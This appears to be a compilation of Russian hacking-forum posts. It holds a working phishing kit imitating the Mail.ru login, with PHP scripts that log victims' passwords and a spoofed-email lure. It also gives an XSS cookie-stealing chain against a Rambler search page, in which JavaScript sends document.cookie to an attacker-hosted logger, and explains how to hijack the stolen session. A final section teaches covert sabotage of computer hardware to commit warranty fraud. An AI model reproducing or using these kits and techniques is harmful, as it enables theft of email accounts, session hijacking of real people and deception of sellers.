    * Сохраним в файл mes.php и зальем на хостинг.

    * Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777

Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:

Код:
 <table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="GET" action="http://адресссайта/mes.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td> 
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr> 
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>

Укажите в параметре action тега form - адрес вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адреса.
Сделать это можно здесь:
http://www.svkadr.ru/vr/conf/index.php?mail=1

Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.

[::.END.::]

Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
До свидания!

0

21

Взлом e-mail для новичков

Автор статьи - dadevil с forum.antichat.ru

Внимание! Содержимое данной статьи предоставляется исключительно для ознакомительных целей! Автор не несет никакой ответственности за Ваши действия и за последствия от Ваших действий.

Несколько способов взлома e-mail аккаунтов

Здравствуйте! Я Drum'and'Bass(dadevil). Сегодня я опишу Вам несколько способов того, как производится взлом e-mail, и как себя защитить от взлома. Я уверен, что на различных сайтах и форумах Вы видели, что люди рекламируют свои услуги взлома всяческих аккаунов. Это могут быть и почтовые аккаунты, и страницы социальных сетей, и игровые персонажи и самые разнообразные учетные записи на других сайтах. Хочется также заметить, что довольно часто мы видим в форумах такие темы и сообщения, как “Помогите взломать e-mail девушки” и т.п.

Как происходит вскрытие почты? Для начала я скажу, что есть несколько способов сделать это:

Взлом почты с помощью фейков. Фейк — это точная подделка страницы авторизации на некотором сайте, в которой пользователь введет свои данные и они запишутся в Вашей базе. Способ заключается в том, что мы сначала подделываем страницу авторизации сайта, пишем несколько PHP скриптов, потом закачиваем созданные файлы к себе на хостинг (можно использовать бесплатный) и отсылаем нашу ссылку жертве. Открывая ссылку, жертва “авторизируется”, и тем самым передает нам свой логин и пароль, которые записываются в нашу базу. Данный способ срабатывает в 60% случаев. Жертва не всегда ведется на то, что бы ввести логин и пароль в нашу подделку. Она может обратить внимание на адрес страницы. Естественно, он будет отличаться от настоящего сайта. Сейчас этот способ не теряет свою актуальность. Он очень часто и широко используется при вскрытии любых аккаунтов.
Взлом почты с помощью XSS-уязвимостей. Данный способ срабатывает приблизительно в 90-95% случаев. Этот способ заключается в использовании XSS уязвимостей сайта. Он намного эффективнее, и жертва даже не всегда понимает, что её логин и пароль уже отправился в Вашу базу данных. Это и не удивляет. Жертва открывает Вашу ссылку, и после загрузки, или даже во время загрузки страницы, выполняется специальный JavaScript код, благодаря которому Вы получаете cookies от необходимого Вам сайта (Что такое cookies и какую пользу можно от них получить, читайте ниже). Данный способ вскрытия аккаунтов используется очень часто, и самое главное, что на него легко можно повестись, даже не подозревая об этом.
Взлом сервера. Самый сложный и наименее используемый способ. В этой статье он рассматриваться не будет.

Для начала я объясню Вам, что такое cookies. Cookies (кукисы) — это специальные переменные, которые устанавливаются браузером, при получении специальной команды от сервера, для определенного сайта, который Вы когда-то посетили. Они сохраняются в пользователя на компьютере. Давайте посетим какой-нибудь сайт. К примеру, http://google.com. Открыли? Теперь в адресной строке, в этом самом окне наберите такой JavaScript код:

javascript:document.cookie

Нам откроется страница с непонятным содержимым. На самом деле, это и есть cookies, который нам установил сайт google.com. Переменные cookies записываются в формате name=value (имя=значение) и разделяются с помощью символа “;”.

Я написал Вам основную информацию о том, какие способы взлома аккаунтов существуют. Теперь я Вам детально попытаюсь объяснить, как работает, и как реализуются первый и второй способа вскрытия (взлом с помощью фейков и взлом с помощью XSS уязвимостей).

1) Взлом почты с помощью фейков

В этом разделе я расскажу, как взломать почту с помощью фейков. Для начала, нам нужно зарегистрировать бесплатный хостинг с поддержкой PHP. В данном примере, я использую http://hostland.su. Регистрация займет у Вас всего пару минут, и еще после регистрации пару минут придется подождать, пока на Вашу почту придет письмо для подтверждения регистрации. После этого можно приступать.

Сначала я расскажу Вам, как именно делаются фейки.
Давайте сделаем фейк для популярного почтовика http://mail.ru. (Будем использовать браузер Mozilla Firefox 3)

Открываем ссылку http://win.mail.ru/cgi-bin/login, так как именно она есть страницей авторизации. Жмем правую кнопку на теле документа. В контекстном меню выбираем опцию “Исходный код страницы”. Выделяем весь код страницы, копируем в буфер обмена, и вставляем в любой текстовый редактор (Скажем, Блокнот). Далее, мы будем работать только с текстом в окне редактора. Для начала ищем слово “Войти”, потому что в нашем случае именно так подписана кнопка авторизации.

Нашли?

Теперь посмотрите на часть кода, которая находиться между тегами <form> и </form>, и которая включает в себе найденный нами фрагмент “Войти”. Данная часть исходного кода страницы отвечает за отправку данных, введенных в форму на сайт. Вот, как она у меня выглядит:

Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);"> <input type="hidden" name="page" value=""> <input type="hidden" name="post" value=""> <input type="hidden" name="login_from" value=""> <tr> <td><img src=http://img.imgsmail.ru/0.gif width=55 height=1><br>Имя</td> <td width=63%><input type="text" name="Login" value="charm0nt" class=w_100></td> <td width=37%><select class=w_100 name="Domain"><option value="mail.ru" SELECTED>@mail.ru</option><option value="inbox.ru" >@inbox.ru</option><option value="bk.ru" >@bk.ru</option><option value="list.ru" >@list.ru</option></select></td> </tr> <tr> <td>Пароль</td> <td colspan=2> <table width=100% cellpadding=0 cellspacing=0 border=0><tr> <td width=100%><input type="password" name="Password" class=w_100></td> <td>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.mail.ru/pages/help/2.html#2185" target=_new>Забыли&nbsp;пароль?</a></td> </tr></table> </td> </tr> <tr> <td>&nbsp;</td> <td><input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label></td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td><input type="Submit" value=" Войти " style="margin-top:4px"></td> <td>&nbsp;</td> </tr></form> Давайте обратим внимание на первую строчку кода: <form method="post" action="auth" onSubmit="return CheckForm(this);">

Эта строчка указывает, куда мы отправляем данные. Данные у нас отправляются на скрипт “auth” (action="auth"). Полный путь к скрипту выглядит так: http://win.mail.ru/cgi-bin/auth. В нашей фейковой странице, мы должны заменить только ту строчку, куда идет отправка данных. В нашем случае, мы будем отправлять данные на наш заранее подготовленный PHP скрипт. Следовательно, заменяем строчку

Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);">

на

Код:
<form method="post" action="log.php" onSubmit="return CheckForm(this);">

Улавливаете разницу? Теперь форма будет обращаться к log.php. Сохраните отредактированный файл под именем index.htm.

Давайте приступим к написанию скриптов.

Напишем log.php с таким содержимым:

Код:
<?PHP $Login = $_POST['login']; // Читаем логин $Domain = $_POST['domain']; // Домен $Browser = getenv("HTTP_USER_AGENT"); // С какого браузера зашли $Pass = $_POST['password']; // Пароль $ip = $_SERVER["REMOTE_ADDR"]; // IP жертвы $Data = date("d-m-y H:i:s", time()); // Дата и время // Записываем полученные данные $text = "[$Data] Browser:[$Browser] IP:$ip Мыло:$Login@$Domain Пасс:$Pass"; $filelog = fopen("base.php","a+"); // Открываем файл базы fwrite($filelog,"\n $text \n"); // Записываем fclose($filelog); // Закрываем header('Location: http://win.mail.ru/cgi-bin/login'); // Переводим жертву на // указанный адрес ?> Этот скрипт будет получать данные и сохранять их на хосте в нашей базе данных - base.php. Напишем код для файла base.php: <?php echo '<H1>Доступ к базе закрыт!!!</H1>'; exit; ?>

Если кто то перейдет из браузера по адресу -- то ему отобразится страница с содержимым “Доступ к базе закрыт!!!”, но если Вы этот файл скачаете с хоста к себе на компьютер, и откроете с помощью текстового редактора, то сможете посмотреть полное его содержимое.

Теперь нужно залить наши файлы на хост. Для этого можно воспользоваться программой Total Comander. Я также хочу заметить, что для загрузки файлов на FTP сервер можно воспользоваться и другими программами.

После того, как Вы подтвердили регистрацию на сайте http://hostland.su (и вообще на любом другом сайте, который предоставляет бесплатные хостинги), Вам должны были прислать письмо, в котором написаны все данные для доступа к новому аккаунту.

Данные для доступа по FTP выглядят примерно так:

host: ftptu2.ru
user: username
password: password
Как использовать эти данные? Очень просто! Я покажу Вам это на примере работы с Total Comander. Другие программы настраиваются по такому же принципу. Для начала запускаем Total Comander.

Вызываем команду FTP => Соединится с FTP сервером…

Теперь нажимаем кнопку “Добавить”, вписываем нужные данные, и жмем “ОК”.

После того, как Вы все правильно сделаете, выполните команду FTP => Соединится с FTP сервером…, выберете только что созданное Вами подключение и нажмите копку “Соединится”. Заливать файлы на хост также просто, как и копировать их на локальный диск. В письме от поставщика услуг (в данном случае — http://hostland.su), должно быть написано, куда можно закачивать файлы. В нашем случае, файлы можно заливать в папку /htdocs/www.

Загрузим все заранее подготовлены нами файлы (index.htm, log.php, base.php) в эту папку.

Сделали? Теперь откройте любой интернет браузер и перейдите по адресу Вашего сайта. Фейк работает. Введите произвольные значения полей “Логин” и “Пароль” и нажмите кнопку “Войти”. Нужно заметить, что после этого браузер перейдет по адресу http://win.mail.ru/cgi-bin/login, а именно его мы указывали в файле log.php.

Теперь из своего хоста загрузите на компьютер файл base.php и откройте его в любом текстовом редакторе. Если появилась новая запись в которой есть точно введенные Ваши данные — значит, поздравляю, Вы все сделали правильно!

2) Взлом почты с помощью XSS-уязвимостей

В этом разделе я расскажу, как взломать почту с помощью XSS уязвимостей. Что такое XSS уязвимость?

Аббревиатура XSS расшифровывается как Сross Site Sсriрting (“межсайтовый скриптинг”). Принято его называть именно XSS, а не СSS, так как СSS введена намного раньше, и означает она Сasсading Style Sheets – «каскадные таблицы стилей» (применяются в оформлении HTML-станиц). Сross – это «крест», поэтому первая буква в «межсайтовом скриптинге» заменена именно на «X». XSS – это уязвимость на сервере, позволяющая внедрить в генерируемую скриптами на сервере HTML-страницу произвольный код путём передачи его в качестве значения нефильтруемой переменной. Под «нефильтруемой» переменной подразумевается переменная, которая перед её использованием в скрипте (например, PHP) не проверяется на наличие запретных символов, таких, как: <,>,’,” и многих других.

РOST-запрос передаёт переменные через массив, неотображаемый в адресной строке браузера; GET-запрос обнаруживает себя в адресной строке следующим образом:

http://www.somesite.com/index.php?fi... … mp;third=3

Тут http://www.somesite.com/index.php — некая страница, к которой мы обращаемся, а first=1&second=2&third=3 — это переменные, передаваемые скрипту. В GET-запросе переменные записываются следующим образом:

имя_переменной_1=значение_переменной_1&имя_перемен ной_2=значение_переменной_2&…&имя_переменной_n=зна чение_переменной_n

То есть для наглядности примера, запишем еще один GET-запрос:

http://www.somesite.com/index.php?им...е_переменной_n

PHP-скрипт может генерировать html-страницу, в которой выводит значение одной из переданных переменных без всякой фильтрации. НО! Если Вы, составляя GET-запрос, вместо обычного значения переменной подставит какие-нибудь ключевые тэги (например, <sсriрt> или <br>), то они выполнятся интерпретатором!

XSS-уязвимости используются в большинстве случаев для кражи кукисов (сookies в большинстве случаев хранят сессию, присвоив себе которую, можно быть на сайте под чужим аккаунтом. Также они хранят зашифрованный пароль, расшифровав который, можно завладеть аккаунтом). Но XSS-баги не ограничиваются кражей сookies.

Что же позволяют осуществить XSS-уязвимости?

Кражу конфиденциальной информации посетителя.
Всё, что умеют СGI-, РERL-, PHP-, ASР-скрипты.
Непредусмотренные стандартом возможности браузера. (Благодаря уязвимостям в самых браузерах)

В следующем примере я буду использовать браузер Internet Explorer 7. (В этой части статьи будет множество всяких ссылок; эти ссылки нужно вводить либо вручную, либо копировать в буфер обмена и вставлять в браузер; никак иначе я не советую, потому что CTRL + клик по ссылке может не правильно отобразить страницу)

Рассмотрим сайт http://rambler.ru. Воспользуемся поиском сайта. Введем произвольный поисковый запрос, например, “Hollywood” и нажмем кнопку “Найти!”. В результате поисковик выдаст множество сайтов, но внимание мы обратим на адрес страницы в браузере.

В меня она выглядит вот так:

http://nova.rambler.ru/search?btnG=%...uery=Hollywood

Теперь договоримся, что для поиска XSS-уязвимостей будем использовать следующий JavaScript код:

Код:
<script>alert("XSS")</script>

Данный код выводит сообщение с текстом “XSS”. Попробуем ввести в поисковую строку этот JavaScript код. Откроется страница с некоторым адресом и с обычным для поисковика содержимым. Но обратим внимание на заголовок окна. У меня он выглядит так:

Rambler: поиск по Интернету. '<script>alert("XSS")</script>' — Windows Internet Explorer

Давайте посмотрим исходный код страницы, в котором найдем первое совпадение со строчкой “<script>alert("XSS")</script>”, то есть строчкой, которую мы ввели в качестве поискового запроса. Нашли? Она должна находиться между HTML тэгами <title> и </title>, которые и отвечают за текст заголовка окна браузера. У меня все это выглядит вот так:

<title>Rambler: поиск по Интернету. '<script>alert("XSS")</script>'</title>

А теперь представим, что случиться, если мы тэг </title> разместим перед нашим скриптом. Получился бы код:

Код:
 </title><script>alert("XSS")</script>

<title>Rambler: поиск по Интернету. '</title><script>alert("XSS")</script>'

который интерпретатор выполнит, поскольку не происходит фильтрации символов, о которых я писал раньше. Но как этого достичь? Оказывается, что очень просто! Давайте введем в поисковую строку такой запрос:

Код:
</title><script>alert("XSS")</script>

то есть сами попытаемся закрыть тэг </title>. Как это ни странно, но JavaScript код выполнился, и мы видим результат:

Неплохо, правда? Снова смотрим на адрес страницы. Так он выглядит у меня:

http://nova.rambler.ru/search?btnG=%...3C/script>

Тут переменная query содержит необходимый нам поисковый запрос, то есть строку “</title><script>alert("XSS")</script>” в зашифрованном виде. Помните, как первый раз мы ввели строку “Hollywood” в качестве поискового запроса? Тогда адрес страницы выглядел так:

http://nova.rambler.ru/search?btnG=%...uery=Hollywood

Видим, что query=Hollywood, что и подтверждает мои слова.

Перейдем по ссылке:

http://nova.rambler.ru/search?btnG=%...и!&amp;query= </title><script>alert("XSS")</script>

И снова видим окошко с текстом “XSS”. Давайте попробуем “опустить” переменную btnG, то есть просто удалим её из адреса страницы, и посмотрим, будет ли работать скрипт. Откроем ссылку:

http://nova.rambler.ru/search?query=< … t>alert("XSS")</script>

Работает!

Только что мы с Вами вывели XSS-уязвимость в сайте wwwrambler.ru. Она присутствует потому, что не происходит фильтрации спецсимволов, и мы можем закрыть тэг <title>, что бы выполнился наш код.

3) Использование XSS-уязвимостей

Как же использовать XSS-уязвимости?

Выше я написал, что XSS-уязвимости чаще всего используются для того, что бы получить cookies жертвы. Давайте с помощью найденной уязвимости на Рамблере, подсмотрим наши кукисы. Для этого выполните следующий JavaScript код: (код document.cookie возвращает cookies сайта)

<script>alert(document.cookie)</script>

То есть, откроем страницу

http://nova.rambler.ru/search?query=< … t>alert(document.cookie)</script>

Мы видим непонятный текст в окошке сообщения. Этот текст и есть наши cookies! Как я раньше писал, они выводятся в формате имя=значение и разделяются “;”.

А что будет, если мы получим кукисы жертвы? Давайте представим такой случай: жертва зашла в свою почту на Рамблере, читает входящие письма. Тут она видит Ваше сообщение, в котором Вы пишете, что нашли прикольный сайт! Заходи! Она переходит по Вашей ссылке… и действительно попадает на какой то сайт. На самом же деле, кукисы уже в нас. Теперь достаточно зайти под браузером, который разрешает редактировать кукисы (например, Opera), и подставить кукисы жертвы, вместо своих. После этого нужно нажать кнопку “Обновить”, — и мы увидим почту жертвы вместо своей J.

Как подставить чужие cookies вместо своих в Opera? Очень просто! Достаточно выполнить команду Инструменты => Настройки… и во вкладке “Дополнительно” выбрать пункт “Cookies”. Теперь, в окошке, что появится, выбираем соответствующие имена кукисов, жмем кнопку “Изменить” и заменяем их соответствующими значениями.

Можете провести эксперимент: зарегистрируйте два почтовых аккаунта на одном и том же почтовом сервере, посмотрите кукисы одного из них и сохраните во временном текстовом файле. Теперь зайдите под вторым аккаунтом, отредактируйте новые кукисы старимы значениями из текстового файла, и нажмите “Обновить”. Мы снова окажемся в первом аккаунте.

Как можно реализовать то, что бы при переходе по ссылке мы получали кукисы того, кто перешел? Очень просто. Помните, как мы учились делать с Вами фейк? Вот теперь нужно создать те же 3 файла, только с немного другим содержимым. Файл base.php должен быть точно таким, как и при создании фейка, а вот код для файла log.php придется переписать немного:

Код:
 <?PHP $Cookies = $a; // Читаем переменную a из // GET-запроса, в которой // будут кукисы $Browser = getenv("HTTP_USER_AGENT"); // С какого браузера зашли $ip = $_SERVER["REMOTE_ADDR"]; // IP жертвы $Data = date("d-m-y H:i:s", time()); // Дата и время // Записываем полученные данные $text = "[$Data] Browser:[$Browser] IP:$ip Cookies:$Cookies"; $filelog = fopen("base.php","a+"); // Открываем файл базы fwrite($filelog,"\n $text \n"); // Записываем fclose($filelog); // Закрываем header('Location: http://somesite.ru'); // Переводим жертву на // указанный адрес ?>

В этом коде мы будем получать кукисы с помощью GET-запроса через переменную “a”, и записывать их в файл.

Как же нам отправить GET-запрос с кукисами на наш скрипт? Тут нету совсем ничего сложного!!! Создадим файл js.js с таким содержимым:

Код:
var concat = function() { var args = Array.prototype.slice.call(arguments); return args.join(""); } a = "http://www.your_site.com/log.php?a="; b = document.cookie; location.href = concat(a, b); В этом JavaScript коде нет ничего сложного. Внимание нужно обратить только на эту строчку: a = "http://www.your_site.com/gate.php?a=";

Тут должен быть полный путь к нашему log.php файлу, и еще + строка “?a=”. Благодаря этому мы дописываем до строки переменную “a” со значением document.cookie. Последняя строка

location.href = concat(a, b);

Пересылает данные нашему скрипту, который записывает кукисы в базу данных.
Теперь нам нужно сделать файл index.htm с таким содержимым:

Код:
<html> <body> <script>location.href="http://nova.rambler.ru/search?query=</title><SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>"</script> </body> </html>

Все 4 файла (index.htm, js.js, log.php, base.php) мы должны залить в одну директорию нашего хостинга. При переходе по нашей ссылке -- и при условии, что все эти файлы будут в корневом мы получим cookies жертвы к сайту http://rambler.ru. Если Вы хотите, что бы файлы не находились в корневом каталоге Вашего сайта, то нужно будет немного изменить код (вместо -- прописать полную ссылку к файлу).

И последнее, на чем я хотел бы сконцентрировать Ваше внимание, это скрипт

Код:
<script>location.href="http://nova.rambler.ru/search?query=</title><SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>"<script>

Он делает редирект на страницу http://nova.rambler.ru/search?query=< … <SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>. Что за странное значение получает переменная query? Она передает в себе скрипт

Код:
<SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>

благодаря которому в код страницы с результатами поиска прописывается еще весь код файла js.js. В противном случае мы бы должны были прописывать его в ссылку сами, делая саму ссылку невероятно длинной и неудобной. То есть конструкция

Код:
<SCRIPT type="text/javascript" src="полный адрес кода"></SCRIPT>

значительно облегчает нашу работу.

4) Как защитить свой почтовый аккаунт?

Во-первых: никогда не открывайте подозрительные ссылки! Во-вторых, не читайте открытки от неизвестных Вам людей. Чаще всего в сообщениях, в которых говорится о том, что на Ваше имя пришла открытка, есть ссылка на фейковую страницу, которая сначала возьмет необходимые данные, а потом сделает редирект на страницу с открыткой, либо еще куда-то.

by DrumAndBass (dadevil)
Спасибо за помошь:rpn,evill,t1o1.

0

22

Как грамотно убить компьютер

По материалам журнала «][akep»

Существует множество причин, по которым кому то может понадобиться убить или ввести в состояние клинической смерти какую‑либо компьютерную железку.
Наиболее часто такая потребность возникает, когда, к примеру, на работе «совершенно случайно» покупают новые компьютеры для секретарш с характеристиками, больше подходящими для хардкорного геймера. Утерю гарантии устроить не составит труда, а вот организовать списание железа бывает намного сложнее. Или, к примеру, хакер купил новую железку, не подумавши и не посмотрев обзоры в сети. Девайсина оказывается китайской поделкой, а обладатель испытывает стойкую потребность сдать ее обратно в магазин. Однако тут он натыкается на чудеса родной бюрократии и воистину гениальные трактовки закона о правах потребителя. Выясняется, что они полностью исключают возможность возврата технически исправного товара. Нередко оказывается, что покупатель сам согласился на эти невыгодные условия, подписав собственноручно свой приговор, именуемый гарантийным талоном. Именно в таких случаях ему может пригодиться умение грамотно убить железку, не оставив никаких следов преступления на теле потерпевшего.

Обратимые методы убийства
В некоторых случаях злоумышленник может подстраховать себя на случай, если железо, которое он хочет вернуть, имеет повреждения, лишающие его гарантии, но тем не менее кое‑как работает. В данном случае он не хочет убивать девайс окончательно и бесповоротно, так как это чревато полным провалом операции. Тогда хакер рискует получить отказ от гарантии и невосстановимый девайс, который уже никому и не подкаким предлогом не удастся впарить. Убить железку так, чтобы ее можно было без проблем оживить, достаточно сложно. Дело в том, что злоумышленник должен обойти в этом деле мастеров из сервис-центра, иначе починят и вернут обратно. К счастью, в большинстве сервисных центров не занимаются ремонтом железа, а, ткнув пальцем в небо, делают заключение о браке или о поломке по вине пользователя и пишут соответствующую бумагу. Тем не менее, нужно учитывать возможность и другого расклада, когда девайс все же постараются починить. Инструментарий хакеру лучше всего иметь под рукой хороший и разнообразный инструмент. Он ведь помнит о том, что в большинстве случаев придется лезть внутрь девайса. Поэтому надо иметь огромное количество разных отверток всех видов и размеров. Отвертки под нестандартные винты также могут потребоваться. Часто используется спирт, пинцеты разных размеров и скальпель. Асы часто применяют паяльник, хороший недымящий флюс и термофен.
Винчестеры
Обратимые способы
Убить винчестер таким образом, чтобы восстановить его мог только сам хакер, можно лишь аппаратным способом. Конечно же, можно покрутить программную часть девайса, наделав софтовых бедблоков, или эмулировать жуткие тормоза, отключив все режимы работы, кроме PIO. Но все это быстро и качественно лечится в руках грамотного человека, поэтому рисковать не стоит. Самый верный способ заставить винт безбожно глюкать, стучать бошками и отказываться работать — это повреждение контактов между печатной платой и гермоблоком. В большинстве современных дисков соединение гермоблока с платой обеспечивается подпружиненными контактами, встроенными в саму банку, в то время как в соответствующем месте на печатной плате находятся контактные площадки, в которые эти зубчики упираются. Если нарушить в этом месте контакт одного или всех зубчиков с платой, то можно до- биться очень интересных спецэффектов и глюков. Злодею важно это сделать так, чтобы ничего при этом не было видно, даже если туда полезет сервисный инженер.Самый простой способ добиться этого заключается в нанесении на контакты печатной платы прозрачного, бесцветного лака, который послужит надежным изолятором,и в то же время не будет заметен. В некоторых моделях винчестеров до сих пор вместо контак тов используются тонкие шлейфики, вставляющиеся в разъем напечатной плате. В этом случае злоумышленник аккуратно вынимает шлейф из его разъема и покрывает контак ты все тем же лаком. Из данного способа автоматически вытекает обратный способ, на этот раз с токопроводящим лаком, которым в былые времена разлочивали множитель на процессорах Athlon. Тут все зависит от фантазии хакера. Основное правило, которым руководствуются техногики в данной ситуации, состоит в том, что ни в коем случае не стоит трогать силовые цепи, связанные с питанием винчестера, в противном случае можно переборщить и устроить красочное шоу с фейерверком. Контакты при этом мажут очень аккуратно, чтобы их потом можно было отмыть. Обычно любят замыкать слаботочные, но критически важные цепи, например, шины данных на модуле, кэш памяти или БИОСа. Некоторые любят поиздеваться и над процессором, но тут приходится действовать наобум — datasheet на него обычно найти сложно. С количеством лака стараются не перебарщивать, так как есть вероятность, что придется его отмывать.
Необратимые способы
Чтобы убить девайс окончательно и бесповоротно, хакер может применить несколько воистину кощунственных методик. Первая и самая надежная — это заворачивание харда в полотенце и отбивание у оного почек. Бьют обычно сильно, но аккуратно, чтобы не повредить внешний вид девайса. Избитый винт получит всевозможные смещения механики банки, благодаря чему он навсегда перестанет работать. Однако есть некоторая опасность, что внутри банки что‑нибудь отва лится, и по гарантии его уж точно не примут, но данная вероятность минимальна. Второй способ заключается в уродовании электроники электричеством. Например, некоторые злодеи берут пьезо-элемент от зажигалки, цилиндрической стороной соединяют его контакт с массой (корпусом) винчестера и пропускают красивые электрические дуги в направлении любой выбранной микросхемы. Лучше всего для этого подходит чип кэш-памяти, процессор и БИОС. Хакер может залить токопроводящий лак под ножки микросхемы так, чтобы исключить какую‑либо возможность его смыть. Если после всего этого девайс продолжит работать, злодею останется только возвестить окружающим о чуде.
CD / DVD привод
Обратимые способы
С дисковыми приводами дело обстоит совсем иначе. С одной стороны, может показаться, что вывести из строя CD-привод намного проще, однако это не всегда так. Суть проблемы заключается в отсутствии доступак электронике резака, ведь она всегда надежно упакована в корпус, защищающий девайс от пыли, а юзера — от шума. На первый взгляд может показаться, что не составляет никаких проблем открутить четыре винта и снять кожух, однако на практике все не так просто. Дело в том, что в большинстве фирм опечатывают корпуса таких девайсов гарантийными стикерами. Программно же можно только угробить девайс, выдернув его питалово в процессе перепрошивки, но восстановить после этого микропрограмму будет весьма проблематично. Злодеям остается лишь один путь:использовать ту часть платы, которая доступна для модификации, рядом с разъемами питания и интерфейса. Применяют обычно тот же токопроводящий лак. Есть вероятность замкнуть какие‑нибудь важные магистрали привода. Также хакер может попробовать налить лак в IDE-разъем. Эффект, судя по всему, будет интереснейший.
Необратимые способы
Первый и самый эффективный способ — отключение питания девайса в момент перепрошивки. Как уже упоминалось, снять микросхему БИОСа с платы сидюка чаще всего весьма проблематично, так как в большинстве случаев она туда припаяна.Вследствие этого раскрыть заговор, то есть изобличить мошенника, практически невозможно. Для этого надо снять микросхему, подключить ее к программатору и проанализировать содержимое. Если даже кто‑то этим займется, то это не будет доказательством преступления, так как слет прошивки мог произойти из‑за каких‑либо глюков электроники. Через открытый лоток можно изуродовать механику привода открывания лотка — например, залив в ось шестеренки клея, однако есть большая вероятность, что с такой неисправностью по гарантии хакера завернут сразу и не раздумывая.
Видеокарта
Обратимые способы
Существует огромное количество способов заставить видеокарту глючить и во всей красе демонстрировать целый букет неисправностей. Самый действенный способ — это эмулировать какую‑нибудь классическую неисправность — например, оперативной памяти. В этом случае у злодея есть возможность пойти программным путем, разогнав видеокарту до таких значений, чтобы она еще кое‑как функционировала, но уже глючила. Чтобы закрепить разгон, хакеру нужно прошить полученные значения в БИОС видюхи. Для этого он сливает с карты ее родной БИОС, подправляет одним из существующих редакторов и снова заливает на место. Как ты понимаешь, такой способ легко фиксится простой перепрошивкой, однако вряд ли с этим кто‑то будет заморачиваться. Злодей может поступить проще: просто убить БИОС левой прошивкой или отключить питание компа в тот момент, когда флешер этого делать не рекомендует. Восстановить БИОС видеокарты потом можно и на ощупь или с участием второй видюхи. Для более надежной пакости злодей использует все тот же проводящий лак, щедро разрисовав им выводы одной из микросхем памяти. В результате этого на экране монитора будут красоваться различные спецэффекты в виде посторонних символов и полосок.
Необратимые способы
Тут открывается широкое поле для действий. Это первый обсуждаемый нами девайс, практически не имеющий защиты от внешних воздействий. Он, как правило, не обладает корпусом и содержит минимальное количество пластиковых частей. Это значит, что с помощью паяльника или термофена с него можно снять «лишние» запчасти. Для этого и нужен хороший флюс, так как хакер не имеет права оставить следы пайки и дать возможность злому сервисному инженеру завернуть девайс. Если ты когда‑нибудь внимательно разглядывал видеокарту, то не мог не заметить, что она имеет громадное количество различных элементов. При этом зачастую далеко не все разведенные на плате места под элементы заняты деталями, поэтому отсутствие одного-единственного компонента будет незаметно, но девайс все равно работать откажется. Обычно снимают элементы, расположенные с обратной стороны платы, на том месте, где установлен процессор. Тем самым повышается вероятность того, что злодей снимет критически важную деталь, а не какой‑нибудь фильтр. Также весьма чувствительна обвеска чипов оперативной памяти, после снятия которых данный чип пе рестанет корректно функционировать. Что-бы аккуратно удалить элемент, хакеру нужно сначала его прогреть паяльником или термофеном, а потом аккуратно потянуть пинцетом. После этого злодею нужно обязательно облагородить место вмешательства. Для этого поверхность смазывается флюсом и прогревается, в результате чего контактные площадки будут выглядеть так, будто там ничего и не было. Останется только смыть спиртом флюс. Неплохо срабатывает и способ с пьезо-элементом, но оперативная память таких вещей не любит. И, наконец, самый простой способ — отключить охлаждение видеокарты и помучить ее в таком состоянии. Правда, этот метод самый непредсказуемый — может сдохнуть процессор, а может, подгорит печатная плата, и в гарантию ее, естественно, не возьмут.
Звук
]Обратимые способы
Со звуковыми картами дела обстоят так же, как и с видео. Не все знают, что подавляющее число звуковух имеют собственный программируемый БИОС, который также злоумышленник может убить, только восстановить его бывает не так просто. Поэтому обычно применяют фантазию и немного лака.
Необратимые способы
Злодей может попробовать сжечь процессор звуковой карты, резко подав на линейный или микрофонный входы мощный, сигнал — в прошлом так была сожжена ни одна звуковушка. При этом, как правило, повреждается не только сам вход, но и цепи, ответственные за выход, но, как к этому отнесутся в сервисном центре, остается только догадываться.
Материнская плата
Обратимые способы
